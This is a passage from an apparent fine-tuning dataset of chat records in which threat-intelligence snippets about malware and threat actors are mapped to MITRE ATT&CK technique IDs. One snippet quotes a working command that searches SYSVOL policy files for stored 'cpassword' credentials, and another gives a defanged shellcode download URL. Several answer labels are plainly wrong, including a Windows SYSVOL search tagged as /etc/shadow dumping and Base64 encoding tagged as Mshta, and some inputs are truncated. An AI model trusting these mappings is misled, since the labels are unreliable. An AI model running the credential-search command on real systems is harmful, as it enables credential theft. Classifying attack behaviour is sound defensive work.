- "content": "T1112 - Modify Registry', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can modify services by using the \"OpenService\" and \"ChangeServiceConfig\" functions."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2. Additionally, malware RoyalDNS has used DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can use thread injection to inject shellcode into the process of security software."
- },
- {
- "role": "assistant",
- "content": "T1055.003 - Thread Execution Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects Keychain storage data and copies those passwords/tokens to a file."
- },
- {
- "role": "assistant",
- "content": "T1555.001 - Credentials from Password Stores: Keychain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware. If they are installed, nothing will be dropped. We'll now break down the 5kplayer trojanized installer"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest uses the \"kill_unwanted\" function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one response. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL/TLS to encrypt the C2 traffic"
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A keylogging tool used by gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences. Passwords stored in this way are encrypted using a known scheme that can easily be decrypted. APT29 GPP password datamining C:\\WINDOWS\\system32\\cmd.exe /C findstr /S /I cpassword \\\\DOMAIN\\sysvol\\DOMAIN\\policies\\*.xml"
- },
- {
- "role": "assistant",
- "content": "T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can enumerate and collect the properties of domain computers."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Victims receive spear phishing emails with attached malicious zip files - typically password protected or HTML file. That file contains an ISO file."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a collection of Privesc-PowerUp modules that can discover and exploit various path interception opportunities in services, processes, and variables."
- },
- {
- "role": "assistant",
- "content": "T1034 - Path Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "esentutl can be used to read and write alternate data streams."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT used voStro.exe, a compiled pypykatz (Python version of Mimikatz), to steal credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When required by the attacker, it is capable of remotely activating the microphone on the compromised computer and capturing sounds. The audio recordings are encoded to MP3 format using a legitimate lame.dll library, which is downloaded and misused by the malware"
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot had used `InstallUtil.exe` to download and deploy executables."
- },
- {
- "role": "assistant",
- "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nefilim uses WerFault.exe and wermgr.exe for DLL Side Loading, a defense evasion technique used by adversaries to execute malicious payloads by hijacking the library manifest used to load DLLs. Werfault.exe is the Windows Error Reporting binary used by many different programs to report errors."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has the ability to download additional components and malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SECOND STAGE JAVASCRIPT INTO POWERSHELL: The second stage JavaScript creates a PowerShell file with the same name in the same directory"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy has been installed via `msiexec.exe`."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has installed a self-signed RPM package mimicking the original system package on RPM based systems."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has created self-signed certificates to sign malicious installers."
- },
- {
- "role": "assistant",
- "content": "T1587.002 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok prompts the user for credentials."
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 removed evidence of email export requests using \"Remove-MailboxExportRequest\". They temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD has the ability to remove set Registry Keys, including those used for persistence."
- },
- {
- "role": "assistant",
- "content": "T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "4H RAT has the capability to obtain file and directory listings."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named “vmtoolsd. Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name ‘MSASCuiLTasks’ in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can utilize web services including Google sites to send and receive C2 data."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT can inject malicious code into process created by the “Command_Create&Inject” function."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has leveraged \"rundll32.exe\" to execute malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore can access the victim's webcam and capture data."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete used the startup folder for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sowbug has used credential dumping tools."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Nefilim ransomware queries volume information (disk volume name and serial number) and Cryptographic Machine GUID. Ransomware families use Cryptographic Machine GUID and volume serial number to generate a unique identifier for the host for encryption/decryption processes. Nefilim obtains Cryptographic Machine GUID by querying the value of MachineGuid in the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has executed a variety of PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder)."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula obfuscates many of its strings using single-byte XOR obfuscation. Samples with a 2012 compile timestamp use a key value of either 0x88 or 0x56. Samples compiled in 2013 and 2014 use a key value of 0x56, while the lone 2015 sample uses 0x57"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses scheduled tasks typically named \"Watchmon Service\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 has configured payloads to load via LD_PRELOAD."
- },
- {
- "role": "assistant",
- "content": "T1574.006 - Hijack Execution Flow: LD_PRELOAD"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget)."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "decrypts resources needed for targeting the victim."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor has the following demonstrated capabilities:To include exploits (for Hangul and Microsoft Office) in its workflows.To modify its campaigns by splitting the payload in to multiple stages To use compromised web servers or legitimate cloud based platforms"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can decrypt encrypted data strings prior to using them."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XTunnel is capable of accessing locally stored passwords on victims."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 deployed rootkits on Linux systems."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "an extra executable; - process hollowing shellcode; - a list of predefined executable names, which the malware uses as a future process name"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used the Ammyy Admin tool as well as TeamViewer for remote access."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates."
- },
- {
- "role": "assistant",
- "content": "T1649 - Steal or Forge Authentication Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can download files onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy persists via a Launch Agent."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet can collect the computer name, RAM used, and operating system version from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RAR archiving – files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil – a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind – a command-line tool that can be used to perform Active Directory queries. Csvde – can be used to extract Active Directory files and data. Ntdsutil – can be used as a credential-dumping tool. WMIExec – can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors"
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Torisma can use HTTP and HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore can capture audio feeds from the system."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer used Tor nodes for C2."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This document was alleged to have been written by the Ministry of Reunification as demonstrated by the logo in the top left.Similar to the \"Golden Time\" campaign, this document exploits an EPS vulnerability in order to download and execute shellcode located on a compromised website:hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.pngThe fake image usage is a common pattern for this group"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A possible explanation for this is that the document was copied to another system with an incorrectly set system time, then saved with the incorrect time"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used UPX to pack files."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amongst the downloaded files, the fake .gif and .jpg files appear to be dependencies for the malware"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
